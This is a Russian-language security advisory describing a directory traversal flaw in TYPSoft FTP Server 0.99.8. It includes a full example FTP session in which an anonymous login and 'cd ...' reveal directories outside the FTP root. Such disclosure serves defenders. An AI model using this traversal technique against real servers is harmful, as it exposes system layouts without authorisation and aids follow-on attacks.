Security Lab

Просмотр структуры каталогов в TYPSoft FTP сервере

Дата публикации:19.12.2002
Всего просмотров:1625
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: TYPSoft FTP Server 0.x
Описание: Marc Bergeron' TYPSoft – FTP сервер для Windows систем, поддерживающий стандартные FTP команды, виртуальную архитектуру файловой системы, ограничение по IP адресам и много чего еще. Уязвимость в программе позволяет удаленным нападающим загружать файлы на сервере вне корневого каталога.

Уязвимость связанна с недостаточной фильтрацией последовательности "." в URL запросах. Любой удаленный пользователь с законным или анонимным доступом к уязвимому TYPSoft FTP серверу может эксплуатировать уязвимость и свободно просмотреть структуру каталогов на уязвимой системе. Такая информация может оказаться полезной в последующих нападениях. Пример:

C:\>ftp 10.20.30.40
Connected to 10.20.30.40.
220 TYPSoft FTP Server 0.99.8 ready...
User (10.20.30.40:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd /
250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ..
550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ...
250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
AdminScripts
ftproot
iissamples
mailroot
Scripts
webpub
wwwroot
226 Transfer complete.
ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
ftp> bye
221 Goodbye!
Уязвимость обнаружена в TYPSoft FTP Server version 0.99.8
Ссылки: TYPSoft FTP Server Directory Traversal Vulnerability